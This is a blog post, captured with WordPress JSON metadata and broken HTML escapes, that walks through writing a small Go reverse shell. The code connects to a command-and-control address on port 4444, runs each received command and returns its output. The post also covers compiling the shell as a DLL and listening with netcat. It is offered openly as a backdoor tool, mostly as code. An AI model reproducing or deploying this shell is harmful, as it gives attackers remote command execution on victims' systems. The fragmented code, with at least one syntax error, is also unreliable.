Here is a really small Go reverse shell (30-ish lines of code that includes comments).<\/p>\n\n\n\n
Environment setup:<\/strong><\/p>\n\n\n\n Download\/install Go from here<\/a>. If you use Windows, you may want to download\/install the TDM-GCC compiler from here<\/a> as well.<\/p>\n\n\n\n Code:<\/strong><\/p>\n\n\n\n First, we need to define what libraries we need:<\/p>\n\n\n\n Next, we only need the main function. Here we will connect to our C2 on a TCP port and display a command prompt. <\/p>\n\n\n\n Now we need to read the the command. As the command is sent when you press ENTER, we need to remove the newline character ‘\\n<\/em>‘.<\/p>\n\n\n\n We are ready to execute the command. Well, not so fast. Remember, we are in an infinite loop so we need an exit condition. Let’s define the exit condition when you send the ‘exit’ command.<\/p>\n\n\n\n Once we have that, we can to execute the command and capture its output. We will use Go’s exec.Command<\/a>. However, before we send call it, we’ll need to see if there are any arguments. To achieve that, we’ll use the Split<\/em> function and we’ll use the white space ‘ ‘ as a delimiter.<\/p>\n\n\n\n To compile it, run go build<\/em>. If you want to compile it as a dll run:<\/p>\n\n\n\n Now open netcat ( Enjoy \ud83d\ude42<\/p>\n\n\n\n <\/p>\n","protected":false},"excerpt":{"rendered":" Here is a really small Go reverse shell (30-ish lines of code that includes comments). Environment setup: Download\/install Go from here. If you use Windows, you may want to download\/install the TDM-GCC compiler from here as well. Code: First, we need to define what libraries we need: Next, we only need the main function. Here […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[22,112,110,11,111,4],"class_list":["post-319","post","type-post","status-publish","format-standard","hentry","category-security","tag-backdoor","tag-exec","tag-go","tag-linux","tag-reverse-shell","tag-windows"],"blocksy_meta":{"styles_descriptor":{"styles":{"desktop":"","tablet":"","mobile":""},"google_fonts":[]}},"featured_image_urls_v2":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":""},"post_excerpt_stackable_v2":" Here is a really small Go reverse shell (30-ish lines of code that includes comments). Environment setup: Download\/install Go from here. If you use Windows, you may want to download\/install the TDM-GCC compiler from here as well. Code: First, we need to define what libraries we need: import “net” import “fmt” import “bufio” import “os\/exec” import “strings” Next, we only need the main function. Here we will connect to our C2 on a TCP port and display a command prompt. conn, _ := net.Dial(“tcp”, “127.0.0.1:4444”) \/\/ we need to have an infinite loop so we can read\/send data for {…<\/p>\n","category_list_v2":"Security<\/a>","author_info_v2":{"name":"malwrforensics","url":"https:\/\/malwrforensics.com\/en\/author\/u_malwrforensics\/"},"comments_num_v2":"0 comments","_links":{"self":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/comments?post=319"}],"version-history":[{"count":10,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/319\/revisions"}],"predecessor-version":[{"id":832,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/319\/revisions\/832"}],"wp:attachment":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/media?parent=319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/categories?post=319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/tags?post=319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}} import \"net\"\n import \"fmt\"\n import \"bufio\"\n import \"os\/exec\"\n import \"strings\"<\/span><\/code><\/pre>\n\n\n\n conn, _ := net.Dial(\"tcp\", \"127.0.0.1:4444\")\n \/\/ we need to have an infinite loop so we can read\/send data\n for\n {\n \/\/ show a command prompt\n fmt.Fprintf(conn, \"$ \")<\/span><\/code><\/pre>\n\n\n\n buf, _ := bufio.NewReader(conn).ReadString(\"\\n\") \n buf = strings.TrimRight(buf, \"\\n\")<\/span><\/code><\/pre>\n\n\n\n \/\/ if command is exit, then get out of the loop \n if buf == \"exit\" { \n break \n } \n else {<\/span><\/code><\/pre>\n\n\n\n command := strings.Split(buf, \" \")\n cmd := exec.Command(command[0], command[1:]\u2026)\n out,err := cmd.Output()\n if err != nil {\n fmt.Fprintf(conn, \"Error\\n\")\n }\n fmt.Fprintf(conn, string(out))\n }<\/span><\/code><\/pre>\n\n\n\ngo build -o <\/code><name><\/code><\/strong>.dll -buildmode=c-shared<\/code><\/p>\n\n\n\nnc -lvp 4444<\/code>) and run your new executable.<\/p>\n\n\n\n